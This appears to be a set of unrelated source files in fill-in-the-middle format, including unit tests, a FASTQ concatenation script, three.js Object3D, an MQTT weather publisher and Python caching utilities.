"tissue_type,dev_stage,isolation_source,collection_date,host,lab_host,sex,mating_type,haplotype,cultivar,ecotype,variety,breed,isolate,strain,clone,country,lat_lon,specimen_voucher,culture_collection,biomaterial,PCR_primers",
"mRNA");
GlobalDataSets.addTestDataSet(GlobalDataSetFile.MOLTYPE_SOURCE_QUALIFIERS, dataRow);
DataRow dataRow1=new DataRow("genomic DNA",Qualifier.GERMLINE_QUALIFIER_NAME);
GlobalDataSets.addTestDataSet(GlobalDataSetFile.SOURCE_QUALIFIERS_MOLTYPE_VALUES, dataRow1);
check = new MoleculeTypeAndSourceQualifierCheck();
}
@After
public void tearDown() {
GlobalDataSets.resetTestDataSets();
}
@Test
public void testCheck_NoEntry() {
assertTrue(check.check(null).isValid());
}
@Test
public void testCheck_NoMoleculeType() {
entry.getSequence().setMoleculeType(null);
source.addQualifier("organism", "Deltavirus");
assertTrue(check.check(entry).isValid());
}
@Test
public void testCheck_NoSequence() {
entry.setSequence(null);
source.addQualifier("organism", "liver");
assertTrue(check.check(entry).isValid());
}
@Test
public void testCheck_noSourceQualifier() {
entry.getSequence().setMoleculeType("mRNA");
ValidationResult result = check.check(entry);
assertEquals(2, result.count("MoleculeTypeAndSourceQualifierCheck",
Severity.ERROR));
}
@Test
public void testCheck_NoSource() {
entry.getSequence().setMoleculeType("mRNA");
entry.removeFeature(source);
ValidationResult result = check.check(entry);
assertEquals(0, result.getMessages().size());
}
@Test
public void testCheck_noRequiredQualifier() {
entry.getSequence().setMoleculeType("mRNA");
source.addQualifier("organism", "some organism");
ValidationResult result = check.check(entry);
assertEquals(1, result.getMessages().size());
}
@Test
public void testCheck_requiredQualifier() {
entry.getSequence().setMoleculeType("mRNA");
source.addQualifier("tissue_type", "liver");
ValidationResult result = check.check(entry);
assertEquals(0, result.getMessages().size());
}
@Test
public void testCheck_Message() {
entry.getSequence().setMoleculeType("mRNA");
ValidationResult result = check.check(entry);
Collection<ValidationMessage<Origin>> messages = result.getMessages(
"MoleculeTypeAndSourceQualifierCheck", Severity.ERROR);
assertEquals(
"At least one of the Qualifiers \"tissue_type, dev_stage, isolation_source, collection_date, host, lab_host, sex, mating_type, haplotype, cultivar, ecotype, variety, breed, isolate, strain, clone, country, lat_lon, specimen_voucher, culture_collection, biomaterial, PCR_primers\" must exist in Source feature if Molecule Type matches the Value \"mRNA\".",
messages.iterator().next().getMessage());
}
@Test
public void testCheck_invalidMolTypeValue() {
entry.getSequence().setMoleculeType("mRNA");
source.addQualifier(Qualifier.GERMLINE_QUALIFIER_NAME);
entry.addFeature(source);
ValidationResult result = check.check(entry);
assertEquals(1,result.getMessages("MoleculeTypeAndSourceQualifierCheck_1", Severity.ERROR).size());<|fim▁hole|> }
@Test
public void testCheck_validMolTypeValue() {
entry.getSequence().setMoleculeType("genomic DNA");
source.addQualifier(Qualifier.GERMLINE_QUALIFIER_NAME);
entry.addFeature(source);
ValidationResult result = check.check(entry);
assertEquals(0,result.getMessages("MoleculeTypeAndSourceQualifierCheck_1", Severity.ERROR).size());
}
}<|fim▁end|> | |
<|file_name|>concatReads.py<|end_file_name|><|fim▁begin|>"""
Author: Junhong Chen
"""
from Bio import SeqIO
import gzip
import sys
import os
pe1 = []
pe2 = []
pname = []
for dirName, subdirList, fileList in os.walk(sys.argv[1]):
for fname in fileList:
tmp = fname.split(".")[0]
tmp = tmp[:len(tmp)-1]
if tmp not in pname:
pname.append(tmp)
pe1.append(dirName+"/"+tmp+"1.fq.gz")
pe2.append(dirName+"/"+tmp+"2.fq.gz")
def concat(name,file_list):
with open(name, 'w') as w_file:
for filen in file_list:
print 'working with',filen
with gzip.open(filen, 'rU') as o_file:
seq_records = SeqIO.parse(o_file, 'fastq')
SeqIO.write(seq_records, w_file, 'fastq')
<|fim▁hole|>#print pe1
#print pe2
concat(sys.argv[2]+"-pe1.fq", pe1)
concat(sys.argv[2]+"-pe2.fq", pe2)<|fim▁end|> | |
<|file_name|>issue-43927-non-ADT-derive.rs<|end_file_name|><|fim▁begin|>// Copyright 2017 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
<|fim▁hole|>#![derive(Debug, PartialEq, Eq)] // should be an outer attribute!
//~^ ERROR `derive` may only be applied to structs, enums and unions
struct DerivedOn;
fn main() {}<|fim▁end|> | #![allow(dead_code)]
|
<|file_name|>test_parallel_executor_seresnext_with_reduce_cpu.py<|end_file_name|><|fim▁begin|># Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
from parallel_executor_test_base import TestParallelExecutorBase, DeviceType
import seresnext_net
import paddle.fluid.core as core
class TestResnetWithReduceBase(TestParallelExecutorBase):
def _compare_reduce_and_allreduce(self, use_device, delta2=1e-5):
if use_device == DeviceType.CUDA and not core.is_compiled_with_cuda():
return
all_reduce_first_loss, all_reduce_last_loss = self.check_network_convergence(
seresnext_net.model,
feed_dict=seresnext_net.feed_dict(use_device),
iter=seresnext_net.iter(use_device),
batch_size=seresnext_net.batch_size(use_device),
use_device=use_device,
use_reduce=False,
optimizer=seresnext_net.optimizer)
reduce_first_loss, reduce_last_loss = self.check_network_convergence(
seresnext_net.model,
feed_dict=seresnext_net.feed_dict(use_device),
iter=seresnext_net.iter(use_device),
batch_size=seresnext_net.batch_size(use_device),
use_device=use_device,
use_reduce=True,
optimizer=seresnext_net.optimizer)
for loss in zip(all_reduce_first_loss, reduce_first_loss):
self.assertAlmostEquals(loss[0], loss[1], delta=1e-5)
for loss in zip(all_reduce_last_loss, reduce_last_loss):
self.assertAlmostEquals(loss[0], loss[1], delta=loss[0] * delta2)
if not use_device:
return
all_reduce_first_loss_seq, all_reduce_last_loss_seq = self.check_network_convergence(
seresnext_net.model,
feed_dict=seresnext_net.feed_dict(use_device),
iter=seresnext_net.iter(use_device),
batch_size=seresnext_net.batch_size(use_device),
use_device=use_device,
use_reduce=False,
optimizer=seresnext_net.optimizer,
enable_sequential_execution=True)
reduce_first_loss_seq, reduce_last_loss_seq = self.check_network_convergence(
seresnext_net.model,
feed_dict=seresnext_net.feed_dict(use_device),<|fim▁hole|> optimizer=seresnext_net.optimizer,
enable_sequential_execution=True)
for loss in zip(all_reduce_first_loss, all_reduce_first_loss_seq):
self.assertAlmostEquals(loss[0], loss[1], delta=1e-5)
for loss in zip(all_reduce_last_loss, all_reduce_last_loss_seq):
self.assertAlmostEquals(loss[0], loss[1], delta=loss[0] * delta2)
for loss in zip(reduce_first_loss, reduce_first_loss_seq):
self.assertAlmostEquals(loss[0], loss[1], delta=1e-5)
for loss in zip(reduce_last_loss, reduce_last_loss_seq):
self.assertAlmostEquals(loss[0], loss[1], delta=loss[0] * delta2)
for loss in zip(all_reduce_first_loss_seq, reduce_first_loss_seq):
self.assertAlmostEquals(loss[0], loss[1], delta=1e-5)
for loss in zip(all_reduce_last_loss_seq, reduce_last_loss_seq):
self.assertAlmostEquals(loss[0], loss[1], delta=loss[0] * delta2)
class TestResnetWithReduceCPU(TestResnetWithReduceBase):
def test_seresnext_with_reduce(self):
self._compare_reduce_and_allreduce(
use_device=DeviceType.CPU, delta2=1e-3)
if __name__ == '__main__':
unittest.main()<|fim▁end|> | iter=seresnext_net.iter(use_device),
batch_size=seresnext_net.batch_size(use_device),
use_device=use_device,
use_reduce=True, |
<|file_name|>SWIGOUTDIR.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/SWIG/SWIGOUTDIR.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
"""
Verify that use of the $SWIGOUTDIR variable causes SCons to recognize
that Java files are created in the specified output directory.
"""
import TestSCons
test = TestSCons.TestSCons()
swig = test.where_is('swig')
if not swig:
test.skip_test('Can not find installed "swig", skipping test.\n')
where_java_include=test.java_where_includes()
if not where_java_include:
test.skip_test('Can not find installed Java include files, skipping test.\n')
test.write(['SConstruct'], """\
env = Environment(tools = ['default', 'swig'],
CPPPATH=%(where_java_include)s,
)
Java_foo_interface = env.SharedLibrary(
'Java_foo_interface',
'Java_foo_interface.i',
SWIGOUTDIR = 'java/build dir',
SWIGFLAGS = '-c++ -java -Wall',
SWIGCXXFILESUFFIX = "_wrap.cpp")
""" % locals())
test.write('Java_foo_interface.i', """\
%module foopack
""")
# SCons should realize that it needs to create the "java/build dir"
# subdirectory to hold the generated .java files.
test.run(arguments = '.')
test.must_exist('java/build dir/foopackJNI.java')
test.must_exist('java/build dir/foopack.java')
# SCons should remove the built .java files.
test.run(arguments = '-c')
test.must_not_exist('java/build dir/foopackJNI.java')
test.must_not_exist('java/build dir/foopack.java')
<|fim▁hole|>test.must_exist('java/build dir/foopack.java')
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:<|fim▁end|> | # SCons should realize it needs to rebuild the removed .java files.
test.not_up_to_date(arguments = '.')
test.must_exist('java/build dir/foopackJNI.java') |
<|file_name|>core.py<|end_file_name|><|fim▁begin|>import os
from angular_flask import app
from flask.ext.restless import APIManager
from flask.ext.mongoengine import MongoEngine
app.config["MONGODB_SETTINGS"] = {'DB':os.environ.get('MONGODB_DB'),"host":os.environ.get('MONGODB_URI')}
mongo_db = MongoEngine(app)<|fim▁hole|><|fim▁end|> |
api_manager = APIManager(app) |
<|file_name|>mqtt.cpp<|end_file_name|><|fim▁begin|>#include <ESP8266WiFi.h>
#include <PubSubClient.h>
#include "mqtt.h"
// Connect to MQTT and set up subscriptions based on configuration
void MQTT::connect() {
// Connect to broker
this->mqttClient.setServer(this->host, this->port);
mqttClient.connect(this->clientId);
Serial.print("Connected to MQTT, with server: ");
Serial.print(this->host);
Serial.print(", port: ");
Serial.print(this->port);
Serial.print(", with client ID: ");
Serial.println(this->clientId);
// Send ping
ping();
}
// Send ping to MQTT broker
void MQTT::ping() {
<|fim▁hole|> sprintf(payload, "%s ok", this->clientId);
this->mqttClient.publish("/status", payload);
Serial.println("Sent ping to broker");
}<|fim▁end|> | char payload[50];
|
<|file_name|>Object3D.js<|end_file_name|><|fim▁begin|>import { Quaternion } from '../math/Quaternion';
import { Vector3 } from '../math/Vector3';
import { Matrix4 } from '../math/Matrix4';
import { EventDispatcher } from './EventDispatcher';
import { Euler } from '../math/Euler';
import { Layers } from './Layers';
import { Matrix3 } from '../math/Matrix3';
import { _Math } from '../math/Math';
/**
* @author mrdoob / http://mrdoob.com/
* @author mikael emtinger / http://gomo.se/
* @author alteredq / http://alteredqualia.com/
* @author WestLangley / http://github.com/WestLangley
* @author elephantatwork / www.elephantatwork.ch
*/
var object3DId = 0;
function Object3D() {
Object.defineProperty( this, 'id', { value: object3DId ++ } );
this.uuid = _Math.generateUUID();
this.name = '';
this.type = 'Object3D';
this.parent = null;
this.children = [];
this.up = Object3D.DefaultUp.clone();
var position = new Vector3();
var rotation = new Euler();
var quaternion = new Quaternion();
var scale = new Vector3( 1, 1, 1 );
function onRotationChange() {
quaternion.setFromEuler( rotation, false );
}
function onQuaternionChange() {
rotation.setFromQuaternion( quaternion, undefined, false );
}
rotation.onChange( onRotationChange );
quaternion.onChange( onQuaternionChange );
Object.defineProperties( this, {
position: {
enumerable: true,
value: position
},
rotation: {
enumerable: true,
value: rotation
},
quaternion: {
enumerable: true,
value: quaternion
},
scale: {
enumerable: true,
value: scale
},
modelViewMatrix: {
value: new Matrix4()
},
normalMatrix: {
value: new Matrix3()
}
} );
this.matrix = new Matrix4();
this.matrixWorld = new Matrix4();
this.matrixAutoUpdate = Object3D.DefaultMatrixAutoUpdate;
this.matrixWorldNeedsUpdate = false;
this.layers = new Layers();
this.visible = true;
this.castShadow = false;
this.receiveShadow = false;
this.frustumCulled = true;
this.renderOrder = 0;
this.userData = {};
}
Object3D.DefaultUp = new Vector3( 0, 1, 0 );
Object3D.DefaultMatrixAutoUpdate = true;
Object.assign( Object3D.prototype, EventDispatcher.prototype, {
isObject3D: true,
onBeforeRender: function () {},
onAfterRender: function () {},
applyMatrix: function ( matrix ) {
this.matrix.multiplyMatrices( matrix, this.matrix );
this.matrix.decompose( this.position, this.quaternion, this.scale );
},
applyQuaternion: function ( q ) {
this.quaternion.premultiply( q );
return this;
},
setRotationFromAxisAngle: function ( axis, angle ) {
// assumes axis is normalized
this.quaternion.setFromAxisAngle( axis, angle );
},
setRotationFromEuler: function ( euler ) {
this.quaternion.setFromEuler( euler, true );
},
setRotationFromMatrix: function ( m ) {
// assumes the upper 3x3 of m is a pure rotation matrix (i.e, unscaled)
this.quaternion.setFromRotationMatrix( m );
},
setRotationFromQuaternion: function ( q ) {
// assumes q is normalized
this.quaternion.copy( q );
},
rotateOnAxis: function () {
// rotate object on axis in object space
// axis is assumed to be normalized
var q1 = new Quaternion();
return function rotateOnAxis( axis, angle ) {
q1.setFromAxisAngle( axis, angle );
this.quaternion.multiply( q1 );
return this;
};
}(),
rotateX: function () {
var v1 = new Vector3( 1, 0, 0 );
return function rotateX( angle ) {
return this.rotateOnAxis( v1, angle );
};
}(),
rotateY: function () {
var v1 = new Vector3( 0, 1, 0 );
return function rotateY( angle ) {
return this.rotateOnAxis( v1, angle );
};
}(),
rotateZ: function () {
var v1 = new Vector3( 0, 0, 1 );
return function rotateZ( angle ) {
return this.rotateOnAxis( v1, angle );
};
}(),
translateOnAxis: function () {
// translate object by distance along axis in object space
// axis is assumed to be normalized
var v1 = new Vector3();
return function translateOnAxis( axis, distance ) {
v1.copy( axis ).applyQuaternion( this.quaternion );
this.position.add( v1.multiplyScalar( distance ) );
return this;
};
}(),
translateX: function () {
var v1 = new Vector3( 1, 0, 0 );
return function translateX( distance ) {
return this.translateOnAxis( v1, distance );
};
}(),
translateY: function () {
var v1 = new Vector3( 0, 1, 0 );
return function translateY( distance ) {
return this.translateOnAxis( v1, distance );
};
}(),
translateZ: function () {
var v1 = new Vector3( 0, 0, 1 );
return function translateZ( distance ) {
return this.translateOnAxis( v1, distance );
};
}(),
localToWorld: function ( vector ) {
return vector.applyMatrix4( this.matrixWorld );
},
worldToLocal: function () {
var m1 = new Matrix4();
return function worldToLocal( vector ) {
return vector.applyMatrix4( m1.getInverse( this.matrixWorld ) );
};
}(),
lookAt: function () {
// This method does not support objects with rotated and/or translated parent(s)
var m1 = new Matrix4();
return function lookAt( vector ) {
if ( this.isCamera ) {
m1.lookAt( this.position, vector, this.up );
} else {
m1.lookAt( vector, this.position, this.up );
}
this.quaternion.setFromRotationMatrix( m1 );
};
}(),
add: function ( object ) {
if ( arguments.length > 1 ) {
for ( var i = 0; i < arguments.length; i ++ ) {
this.add( arguments[ i ] );
}
return this;
}
if ( object === this ) {
console.error( "THREE.Object3D.add: object can't be added as a child of itself.", object );
return this;
}
if ( ( object && object.isObject3D ) ) {
if ( object.parent !== null ) {
object.parent.remove( object );
}
object.parent = this;
object.dispatchEvent( { type: 'added' } );
this.children.push( object );
} else {
console.error( "THREE.Object3D.add: object not an instance of THREE.Object3D.", object );
}
return this;
},
remove: function ( object ) {
if ( arguments.length > 1 ) {
for ( var i = 0; i < arguments.length; i ++ ) {
this.remove( arguments[ i ] );
}
return this;
}
var index = this.children.indexOf( object );
if ( index !== - 1 ) {
object.parent = null;
object.dispatchEvent( { type: 'removed' } );
this.children.splice( index, 1 );
}
return this;
},
getObjectById: function ( id ) {
return this.getObjectByProperty( 'id', id );
},
getObjectByName: function ( name ) {
return this.getObjectByProperty( 'name', name );
},
getObjectByProperty: function ( name, value ) {
if ( this[ name ] === value ) return this;
for ( var i = 0, l = this.children.length; i < l; i ++ ) {
var child = this.children[ i ];
var object = child.getObjectByProperty( name, value );
if ( object !== undefined ) {
return object;
}
}
return undefined;
},
getWorldPosition: function ( optionalTarget ) {
var result = optionalTarget || new Vector3();
this.updateMatrixWorld( true );
return result.setFromMatrixPosition( this.matrixWorld );
},
getWorldQuaternion: function () {
var position = new Vector3();
var scale = new Vector3();
return function getWorldQuaternion( optionalTarget ) {
var result = optionalTarget || new Quaternion();
this.updateMatrixWorld( true );
this.matrixWorld.decompose( position, result, scale );
return result;
};
}(),
getWorldRotation: function () {
var quaternion = new Quaternion();
return function getWorldRotation( optionalTarget ) {
var result = optionalTarget || new Euler();
this.getWorldQuaternion( quaternion );
return result.setFromQuaternion( quaternion, this.rotation.order, false );
};
}(),
getWorldScale: function () {
var position = new Vector3();
var quaternion = new Quaternion();
return function getWorldScale( optionalTarget ) {
var result = optionalTarget || new Vector3();
this.updateMatrixWorld( true );
this.matrixWorld.decompose( position, quaternion, result );
return result;
};
}(),
getWorldDirection: function () {
var quaternion = new Quaternion();
return function getWorldDirection( optionalTarget ) {
var result = optionalTarget || new Vector3();
this.getWorldQuaternion( quaternion );
return result.set( 0, 0, 1 ).applyQuaternion( quaternion );
};
}(),
raycast: function () {},
traverse: function ( callback ) {
callback( this );
var children = this.children;
for ( var i = 0, l = children.length; i < l; i ++ ) {
children[ i ].traverse( callback );
}
},
traverseVisible: function ( callback ) {
if ( this.visible === false ) return;
callback( this );
var children = this.children;
for ( var i = 0, l = children.length; i < l; i ++ ) {
children[ i ].traverseVisible( callback );
}
},
traverseAncestors: function ( callback ) {
var parent = this.parent;
if ( parent !== null ) {
callback( parent );
parent.traverseAncestors( callback );
}
},
updateMatrix: function () {
this.matrix.compose( this.position, this.quaternion, this.scale );
this.matrixWorldNeedsUpdate = true;
},
updateMatrixWorld: function ( force ) {
if ( this.matrixAutoUpdate ) this.updateMatrix();
if ( this.matrixWorldNeedsUpdate || force ) {
if ( this.parent === null ) {
this.matrixWorld.copy( this.matrix );
} else {
this.matrixWorld.multiplyMatrices( this.parent.matrixWorld, this.matrix );
}
this.matrixWorldNeedsUpdate = false;
force = true;
}
// update children
var children = this.children;
for ( var i = 0, l = children.length; i < l; i ++ ) {
children[ i ].updateMatrixWorld( force );
}
},
toJSON: function ( meta ) {
// meta is '' when called from JSON.stringify
var isRootObject = ( meta === undefined || meta === '' );
var output = {};
// meta is a hash used to collect geometries, materials.
// not providing it implies that this is the root object
// being serialized.
if ( isRootObject ) {
// initialize meta obj
meta = {
geometries: {},
materials: {},
textures: {},
images: {}
};
output.metadata = {
version: 4.5,
type: 'Object',
generator: 'Object3D.toJSON'
};
}
// standard Object3D serialization
var object = {};
object.uuid = this.uuid;
object.type = this.type;
if ( this.name !== '' ) object.name = this.name;
if ( this.castShadow === true ) object.castShadow = true;
if ( this.receiveShadow === true ) object.receiveShadow = true;
if ( this.visible === false ) object.visible = false;
if ( JSON.stringify( this.userData ) !== '{}' ) object.userData = this.userData;
object.matrix = this.matrix.toArray();
//
function serialize( library, element ) {
if ( library[ element.uuid ] === undefined ) {
library[ element.uuid ] = element.toJSON( meta );
}
return element.uuid;
}<|fim▁hole|>
object.geometry = serialize( meta.geometries, this.geometry );
}
if ( this.material !== undefined ) {
if ( Array.isArray( this.material ) ) {
var uuids = [];
for ( var i = 0, l = this.material.length; i < l; i ++ ) {
uuids.push( serialize( meta.materials, this.material[ i ] ) );
}
object.material = uuids;
} else {
object.material = serialize( meta.materials, this.material );
}
}
//
if ( this.children.length > 0 ) {
object.children = [];
for ( var i = 0; i < this.children.length; i ++ ) {
object.children.push( this.children[ i ].toJSON( meta ).object );
}
}
if ( isRootObject ) {
var geometries = extractFromCache( meta.geometries );
var materials = extractFromCache( meta.materials );
var textures = extractFromCache( meta.textures );
var images = extractFromCache( meta.images );
if ( geometries.length > 0 ) output.geometries = geometries;
if ( materials.length > 0 ) output.materials = materials;
if ( textures.length > 0 ) output.textures = textures;
if ( images.length > 0 ) output.images = images;
}
output.object = object;
return output;
// extract data from the cache hash
// remove metadata on each item
// and return as array
function extractFromCache( cache ) {
var values = [];
for ( var key in cache ) {
var data = cache[ key ];
delete data.metadata;
values.push( data );
}
return values;
}
},
clone: function ( recursive ) {
return new this.constructor().copy( this, recursive );
},
copy: function ( source, recursive ) {
if ( recursive === undefined ) recursive = true;
this.name = source.name;
this.up.copy( source.up );
this.position.copy( source.position );
this.quaternion.copy( source.quaternion );
this.scale.copy( source.scale );
this.matrix.copy( source.matrix );
this.matrixWorld.copy( source.matrixWorld );
this.matrixAutoUpdate = source.matrixAutoUpdate;
this.matrixWorldNeedsUpdate = source.matrixWorldNeedsUpdate;
this.layers.mask = source.layers.mask;
this.visible = source.visible;
this.castShadow = source.castShadow;
this.receiveShadow = source.receiveShadow;
this.frustumCulled = source.frustumCulled;
this.renderOrder = source.renderOrder;
this.userData = JSON.parse( JSON.stringify( source.userData ) );
if ( recursive === true ) {
for ( var i = 0; i < source.children.length; i ++ ) {
var child = source.children[ i ];
this.add( child.clone() );
}
}
return this;
}
} );
export { Object3D };<|fim▁end|> |
if ( this.geometry !== undefined ) { |
<|file_name|>weatherpublisher.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
import time
import json
import requests
from datetime import datetime
import paho.mqtt.client as mqtt
from sense_hat import SenseHat
BROKER_URL = '192.168.24.25'
CYCLE_TIME = 10
# initialisiere SenseHat-Erweiterung
sense = SenseHat()
sense.low_light = True
def get_location():
"""Ermittelt die Stadt zur eigenen IP-Adresse."""
IP_LOCKUP_URL = "https://ipinfo.io/"<|fim▁hole|> data = json.loads(r.text)
return data['city']
def get_weather(city):
    """Query the current weather for *city* from openweathermap.org.

    Returns a tuple (weather, temp, humidity, wind_speed, sunrise, sunset)
    where temp is in degrees Celsius and sunrise/sunset are datetimes.
    For an unknown city (API code '404') returns ('', 0, 0, 0, '', '').
    """
    URL = 'http://api.openweathermap.org/data/2.5/weather?q={}&APPID={}'
    API_KEY = ''  # <- insert API key for openweathermap.org
    r = requests.get(URL.format(city, API_KEY))
    data = json.loads(r.text)
    if data['cod'] == '404':
        # Unknown city: return neutral placeholder values.
        return '', 0, 0, 0, '', ''
    weather = data['weather'][0]['main']
    temp = data['main']['temp'] - 273.15  # API reports Kelvin; convert to Celsius
    humidity = data['main']['humidity']
    wind_speed = data['wind']['speed']
    sunrise = datetime.fromtimestamp(data['sys']['sunrise'])
    sunset = datetime.fromtimestamp(data['sys']['sunset'])
    return weather, temp, humidity, wind_speed, sunrise, sunset
if __name__ == '__main__':
    try:
        # Connect to the MQTT broker and publish weather + SenseHat sensor
        # readings on their topics every CYCLE_TIME seconds.
        mqttc = mqtt.Client()
        mqttc.connect(BROKER_URL, 1883, 60)
        while True:
            weather, temp, humidity, wind_speed, sunrise, sunset = get_weather(get_location())
            mqttc.publish('umgebung/wetter', str(weather))
            mqttc.publish('umgebung/temperatur', str(temp))
            mqttc.publish('umgebung/luftfeuchtigkeit', str(humidity))
            mqttc.publish('umgebung/windgeschwindigkeit', str(wind_speed))
            mqttc.publish('umgebung/sonnenaufgang', str(sunrise))
            mqttc.publish('umgebung/sonnenuntergang', str(sunset))
            mqttc.publish('wohnzimmer/temperatur', str(sense.get_temperature()))
            mqttc.publish('wohnzimmer/luftdruck', str(sense.get_pressure()))
            mqttc.publish('wohnzimmer/luftfeuchtigkeit', str(sense.get_humidity()))
            # check whether the joystick was pushed down (exit gesture)
            for event in sense.stick.get_events():
                if 'down' in event.direction:
                    exit()
            time.sleep(CYCLE_TIME)
    except KeyboardInterrupt:
        # Clean shutdown on Ctrl-C: close the broker connection, blank the LEDs.
        mqttc.disconnect()
        sense.clear()
        print('Tschüß!')
r = requests.get(IP_LOCKUP_URL)
except:
print("error while querying info...") |
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>"""Misc support code.
Copyright (c) 2015 Civic Knowledge. This file is licensed under the terms of
the Revised BSD License, included in this distribution as LICENSE.txt
"""
from collections import OrderedDict, defaultdict, Mapping, deque, MutableMapping, Callable
from functools import partial, reduce, wraps
import json
import hashlib
import logging
import os
import pprint
import re
import subprocess
import sys
from time import time
import yaml
from yaml.representer import RepresenterError
import warnings
from bs4 import BeautifulSoup
from six.moves import filterfalse, xrange as six_xrange
from six import iteritems, iterkeys, itervalues, print_, StringIO
from six.moves.urllib.parse import urlparse, urlsplit, urlunsplit
from six.moves.urllib.request import urlopen
from ambry.dbexceptions import ConfigurationError
logger_init = set()
def get_logger(name, file_name=None, stream=None, template=None, propagate=False, level=None):
    """Return a logger configured with a single stream handler.

    Any handlers from a previous call are discarded. While the test suite is
    running and no explicit level was given, the level defaults to CRITICAL
    so log output stays quiet; otherwise it defaults to INFO. If *file_name*
    is given, a timestamped file handler is added as well.
    """
    log = logging.getLogger(name)

    under_test = 'test' in sys.argv or sys.argv[0].endswith('py.test')
    if not level:
        # No level requested: silence tests, otherwise default to INFO.
        level = logging.CRITICAL if under_test else logging.INFO

    log.setLevel(level)
    log.propagate = propagate

    fmt = logging.Formatter(template)
    out = stream or sys.stdout

    log.handlers = []  # drop handlers installed by earlier calls

    stream_handler = logging.StreamHandler(stream=out)
    stream_handler.setFormatter(fmt)
    log.addHandler(stream_handler)

    if file_name:
        file_handler = logging.FileHandler(file_name)
        file_handler.setFormatter(logging.Formatter('%(asctime)s ' + template))
        log.addHandler(file_handler)

    return log
# From https://wiki.python.org/moin/PythonDecoratorLibrary#Memoize
def memoize(obj):
    """Cache obj's return values, keyed on the repr of its arguments.

    The cache is exposed as the ``cache`` attribute of the decorated callable.
    """
    store = obj.cache = {}

    @wraps(obj)
    def wrapper(*args, **kwargs):
        signature = str(args) + str(kwargs)
        if signature not in store:
            store[signature] = obj(*args, **kwargs)
        return store[signature]

    return wrapper
def expiring_memoize(obj):
    """Like memoize, but a cached value is dropped ~10 seconds after the
    key was last accessed (every call refreshes the access timestamp)."""
    store = obj.cache = {}
    stamps = obj.last_access = defaultdict(int)

    @wraps(obj)
    def wrapper(*args, **kwargs):
        key = str(args) + str(kwargs)

        previous = stamps[key]
        if previous and previous + 10 < time():
            # Entry is stale: forget it so it gets recomputed below.
            store.pop(key, None)

        stamps[key] = time()

        try:
            return store[key]
        except KeyError:
            store[key] = obj(*args, **kwargs)
            return store[key]

    return wrapper
class Counter(dict):
    """Mapping where default values are zero.

    Unlike collections.Counter, reading a missing key returns 0 without
    inserting it, which makes ``c[k] += 1`` work for unseen keys.
    """

    def __missing__(self, key):
        # dict invokes __missing__ only when normal lookup fails.
        return 0
# Stolen from:
# http://code.activestate.com/recipes/498245-lru-and-lfu-cache-decorators/
def lru_cache(maxsize=128, maxtime=60):
    '''Least-recently-used cache decorator.

    Arguments to the cached function must be hashable.
    Cache performance statistics stored in f.hits and f.misses.
    Clear the cache with f.clear().
    Entries also expire *maxtime* seconds after being stored (0/None disables
    time-based expiry).
    http://en.wikipedia.org/wiki/Cache_algorithms#Least_Recently_Used

    '''
    # The usage queue may hold duplicates; let it grow well past maxsize
    # before compacting.
    maxqueue = maxsize * 10

    # @ReservedAssignment
    def decorating_function(
            user_function,
            len=len,
            iter=iter,
            tuple=tuple,
            sorted=sorted,
            KeyError=KeyError):
        cache = {}                   # mapping of args to (result, expire_time)
        queue = deque()              # order that keys have been used
        refcount = Counter()         # times each key is in the queue
        sentinel = object()          # marker for looping around the queue
        kwd_mark = object()          # separate positional and keyword args

        # lookup optimizations (ugly but fast)
        queue_append, queue_popleft = queue.append, queue.popleft
        queue_appendleft, queue_pop = queue.appendleft, queue.pop

        @wraps(user_function)
        def wrapper(*args, **kwds):
            # cache key records both positional and keyword args
            key = args
            if kwds:
                key += (kwd_mark,) + tuple(sorted(kwds.items()))

            # record recent use of this key
            queue_append(key)
            refcount[key] += 1

            # get cache entry or compute if not found (or expired)
            try:
                result, expire_time = cache[key]
                if expire_time and time() > expire_time:
                    raise KeyError('Expired')
                wrapper.hits += 1
            except KeyError:
                result = user_function(*args, **kwds)
                if maxtime:
                    expire_time = time() + maxtime
                else:
                    expire_time = None
                cache[key] = result, expire_time
                wrapper.misses += 1

                # purge least recently used cache entry: skip queue entries
                # that still have more recent duplicates further along.
                if len(cache) > maxsize:
                    key = queue_popleft()
                    refcount[key] -= 1
                    while refcount[key]:
                        key = queue_popleft()
                        refcount[key] -= 1
                    del cache[key], refcount[key]

            # periodically compact the queue by eliminating duplicate keys
            # while preserving order of most recent access
            if len(queue) > maxqueue:
                refcount.clear()
